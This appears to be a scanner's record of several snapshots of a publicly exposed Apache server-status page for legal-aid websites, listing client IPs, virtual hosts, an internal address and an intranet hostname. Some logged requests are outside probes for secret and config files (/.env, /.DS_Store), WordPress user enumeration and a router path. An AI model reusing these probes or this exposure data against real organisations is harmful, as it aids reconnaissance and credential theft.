::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00170290500.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82815458800.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00822598500.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15812410600.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0681424056620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23814240500.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00822602000.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00822601800.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32814240510080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00822601900.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00822601700.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00822601600.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00822601500.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00822601400.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00822601300.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001281835200.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001281835100.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001281835000.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001281834900.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001281834800.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001281834700.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001281834600.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001281834500.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001281834400.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001281834300.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.0012818342
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed3273690b
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Saturday, 01-Nov-2025 03:35:25 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 571 Parent Server MPM Generation: 570 Server uptime: 570 days 10 hours 40 minutes 52 seconds Server load: 0.00 0.00 0.00 Total accesses: 13744324 - Total Traffic: 195.1 GB CPU Usage: u288.46 s24.8 cu0 cs0 - .000636% CPU load .279 requests/sec - 4251 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers ...____._W_..___................................................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-570-0/0/811083. 5.131407800.00.0013421.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-570-0/0/788154. 6.891408000.00.0013037.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 2-570-0/0/756496. 2.071408300.00.0012877.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 3-57063660/30/738622_ 3.7245100.00.8012353.68 65.49.20.69http/1.1atlantalegalaid.org:8080GET /geoserver/web/ HTTP/1.1 4-57066150/27/719146_ 3.21668500.00.6711839.44 15.158.40.136http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 5-570106170/15/698730_ 2.1551300.00.6011532.09 65.49.20.69http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 6-57086430/26/659400_ 4.50733800.01.3110850.99 204.76.203.212http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-570-0/0/634508. 0.691407900.00.0010359.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 8-57086530/32/602511_ 4.80610300.01.299777.03 103.252.89.75http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 9-570637125/60/582555W 4.880029.60.959172.31 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 10-570118170/8/513675_ 1.13424700.00.208722.27 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-570-0/0/478230. 1.181408200.00.007884.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-570-0/0/414490. 0.761408100.00.006562.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-57063500/29/328285_ 4.30440300.01.014776.37 94.74.191.4http/1.1atlantalegalaid.org:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 14-570118320/9/289276_ 1.39395020.00.734299.83 130.176.137.70http/1.1picturingjustice.org:8080GET / HTTP/1.1 15-570118370/5/264918_ 0.5646100.00.173767.75 65.49.20.81http/1.1atlantalegalaid.org:8080CONNECT www.shadowserver.org:443 HTTP/1.1 16-567-0/0/230198. 0.0026797900.00.003425.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-567-0/0/167507. 0.0026797700.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-567-0/0/145384. 0.0026797600.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-567-0/0/137585. 0.0026799000.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-567-0/0/128254. 0.0026798900.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-567-0/0/116725. 0.0026798800.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0026797500.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0026797200.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0026797400.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0026797100.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00149912800.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00149912700.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00149912600.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00149912400.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00149912500.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00149912300.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82795080500.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00802220300.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15792032300.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0679386236620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23793862300.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00802223800.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00802223600.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32793862310080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00802223700.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00802223500.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00802223400.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00802223300.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00802223200.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00802223100.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001261457000.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001261456900.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001261456800.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001261456700.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001261456600.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001261456500.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001261456400.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001261456300.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001261456200.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001261456100.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.0012614560
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed22ca3703
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 30-Oct-2025 20:37:20 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 570 Parent Server MPM Generation: 569 Server uptime: 569 days 3 hours 42 minutes 47 seconds Server load: 0.00 0.00 0.00 Total accesses: 13743803 - Total Traffic: 195.1 GB CPU Usage: u276.34 s23.57 cu0 cs0 - .00061% CPU load .279 requests/sec - 4260 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers __W___._.__.._.................................................. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-569314040/15/811042_ 2.28136800.00.1413419.65 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 1-569313660/20/788110_ 2.03935400.00.5013036.05 130.176.187.246http/1.1elearning.alas.org:8080GET /robots.txt HTTP/1.1 2-5693152625/39/756451W 2.130029.60.6212876.46 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 3-569320470/23/738582_ 3.27845900.00.9912352.42 204.76.203.219http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 4-569313670/17/719111_ 1.25636800.00.1511838.38 91.106.73.26http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-569313720/36/698707_ 6.23105572550.01.8011531.22 70.132.4.80http/1.1atlantalegalaid.org:8080POST /api/gql HTTP/1.1 6-569-0/0/659354. 0.003888000.00.0010848.43 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 7-569313770/48/634485_ 7.96105321490.02.4310359.21 70.132.4.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 8-569-0/0/602470. 0.003887900.00.009775.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-569323080/12/582476_ 1.79553400.00.489170.49 147.185.132.30http/1.1atlantalegalaid.org:8080GET / HTTP/1.0 10-569323130/7/513662_ 0.81105542400.00.148721.94 130.176.137.70http/1.1atlantalegalaid.org:8080POST /alas/wp-cron.php?doing_wp_cron=1761846078.207672119140625 11-568-0/0/478218. 3.075327800.00.007884.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-568-0/0/414477. 0.465113800.00.006561.76 66.132.153.130http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 13-569313820/15/328245_ 1.30141400.00.244774.97 94.74.191.4http/1.1atlantalegalaid.org:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 14-568-0/0/289260. 0.975113800.00.004298.91 157.173.106.50http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 15-568-0/0/264908. 0.465327900.00.003767.45 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-567-0/0/230198. 0.0015649400.00.003425.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-567-0/0/167507. 0.0015649200.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-567-0/0/145384. 0.0015649100.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-567-0/0/137585. 0.0015650500.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-567-0/0/128254. 0.0015650400.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-567-0/0/116725. 0.0015650300.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-567-0/0/121127. 0.0015649000.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-567-0/0/106101. 0.0015648700.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-567-0/0/108712. 0.0015648900.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-567-0/0/86000. 0.0015648600.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00138764300.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00138764200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00138764100.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00138763900.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00138764000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00138763800.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82783932000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00791071800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15780883800.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0678271386620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23782713800.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00791075300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00791075100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32782713810080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00791075200.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00791075000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00791074900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00791074800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00791074700.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00791074600.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001250308400.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001250308300.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001250308200.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001250308100.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001250308000.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001250307900.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001250307800.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001250307700.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001250307600.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001250307500.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed7d5712a2
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 28-Oct-2025 11:20:40 UTC Restart Time: Tuesday, 09-Apr-2024 16:54:33 UTC Parent Server Config. Generation: 568 Parent Server MPM Generation: 567 Server uptime: 566 days 18 hours 26 minutes 7 seconds Server load: 0.00 0.00 0.00 Total accesses: 13741712 - Total Traffic: 195.1 GB CPU Usage: u316.64 s26.38 cu0 cs0 - .0007% CPU load .281 requests/sec - 4276 B/second - 14.9 kB/request 1 requests currently being processed, 9 idle workers _W______.__..................................................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-567163080/19/810892_ 3.102163110.00.9213414.58 130.176.157.73http/1.1cdn.atlantalegalaid.org:8080GET / HTTP/1.1 1-5671631425/58/787885W 6.410029.61.9313027.64 130.176.208.143http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 2-567163220/32/756321_ 5.88215950.01.7912870.71 130.176.157.73http/1.1code.atlantalegalaid.org:8080GET / HTTP/1.1 3-567163270/16/738363_ 2.4661400.00.5912344.36 94.74.191.4http/1.1atlantalegalaid.org:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 4-567163320/15/718969_ 2.5521791630.00.6611832.15 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 5-567176220/0/698544_ 4.32216500.00.0011524.08 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 6-567162670/49/659297_ 2.3921591620.00.7210846.48 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 7-567162610/30/634330_ 5.3121591670.01.4510351.74 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 8-567-0/0/602330. 6.96215400.00.009770.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 9-567170680/22/582177_ 4.2921556530.01.089163.52 130.176.157.73http/1.1intranet.atlantalegalaid.org:80GET / HTTP/1.1 10-567170730/12/513377_ 3.0921561510.00.408714.68 130.176.157.73http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 11-566-0/0/478189. 4.393126500.00.007883.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-566-0/0/414454. 15.053126100.00.006560.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-566-0/0/328201. 2.00177382590.00.004773.70 149.40.49.208http/1.1 14-567-0/0/289252. 3.55855100.00.004298.64 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-566-0/0/264903. 0.873125900.00.003767.32 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-566-0/0/230196. 1.08177381590.00.003425.32 185.198.240.153http/1.1 17-566-0/0/167505. 0.003920200.00.002333.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-566-0/0/145382. 0.003920100.00.002061.61 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-566-0/0/137584. 0.003920000.00.002103.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 20-566-0/0/128253. 3.423126300.00.001822.94 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-566-0/0/116724. 0.003919900.00.001693.47 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-566-0/0/121125. 0.003919800.00.001644.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-566-0/0/106099. 0.003919700.00.001535.56 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 24-566-0/0/108710. 0.003919600.00.001366.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-562-0/0/85998. 0.0040676300.00.001085.54 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-553-0/0/68644. 0.00118144300.00.001013.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-553-0/0/65060. 0.00118144200.00.00878.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-553-0/0/61934. 0.00118144100.00.00787.40 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-553-0/0/56794. 0.00118143900.00.00693.67 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-553-0/0/58166. 0.00118144000.00.00687.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-553-0/0/53030. 0.00118143800.00.00675.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-478-0/0/57075. 45.82763312000.00.00733.18 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-478-0/0/53411. 0.00770451800.00.00623.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-479-0/0/56665. 6.15760263800.00.00671.37 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-478-0/0/56160. 56.0676209386620.00.00668.41 178.72.88.155http/1.1 36-478-0/0/54016. 42.23762093800.00.00655.57 185.91.127.107http/1.1atlantalegalaid.org:8080CONNECT pro.ip-api.com:443 HTTP/1.1 37-478-0/0/50613. 0.00770455300.00.00617.12 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 38-478-0/0/56919. 0.00770455100.00.00664.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-478-0/0/50168. 41.32762093810080.00.00563.28 130.176.137.70http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 40-478-0/0/49226. 0.00770455200.00.00536.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 41-478-0/0/31022. 0.00770455000.00.00337.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-478-0/0/31948. 0.00770454900.00.00355.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-478-0/0/31606. 0.00770454800.00.00323.77 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-478-0/0/31936. 0.00770454700.00.00329.24 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 45-478-0/0/32825. 0.00770454600.00.00314.21 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-424-0/0/31620. 0.001229688500.00.00330.25 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-424-0/0/30477. 0.001229688400.00.00310.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-424-0/0/30619. 0.001229688300.00.00292.89 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-424-0/0/32543. 0.001229688200.00.00363.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-424-0/0/28558. 0.001229688100.00.00313.91 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-424-0/0/33526. 0.001229688000.00.00333.59 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-424-0/0/27166. 0.001229687900.00.00267.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-424-0/0/27870. 0.001229687800.00.00263.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-424-0/0/29010. 0.001229687700.00.00269.73 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-424-0/0/27937. 0.001229687600.00.00286.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-424-0/0/27330. 0.001229687500.00.00294.75 ::1htt
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed3bc28f23
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Sunday, 13-Aug-2023 12:09:36 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 115 Parent Server MPM Generation: 114 Server uptime: 113 days 20 hours 25 minutes 38 seconds Server load: 0.00 0.00 0.00 Total accesses: 1850090 - Total Traffic: 26.5 GB CPU Usage: u158.61 s25.28 cu0 cs0 - .00187% CPU load .188 requests/sec - 2897 B/second - 15.0 kB/request 11 requests currently being processed, 10 idle workers _KKK_KWKK._K_K.K__..._.___.........K............................ ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-114170270/17/130809_ 0.3612810.00.121944.27 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 1-114170323/6/128403K 0.18017584.40.172003.23 130.176.137.97http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 2-114170332/6/123865K 0.17303.30.171841.65 70.132.4.95http/1.1legalaidconnections.org:8080GET / HTTP/1.1 3-114170421/7/122284K 0.21401.10.111796.84 70.132.4.89http/1.1legalaidconnections.org:8080GET /about HTTP/1.1 4-114170430/6/118836_ 0.1913510.00.171712.85 70.132.4.67http/1.1gwinnettfamilylawclinic.org:808GET /.DS_Store HTTP/1.1 5-114170488/19/115827K 0.290010.90.191690.87 70.132.4.67http/1.1legalaidconnections.org:8080GET /v2/_catalog HTTP/1.1 6-114170535/11/107681W 0.13006.60.021666.02 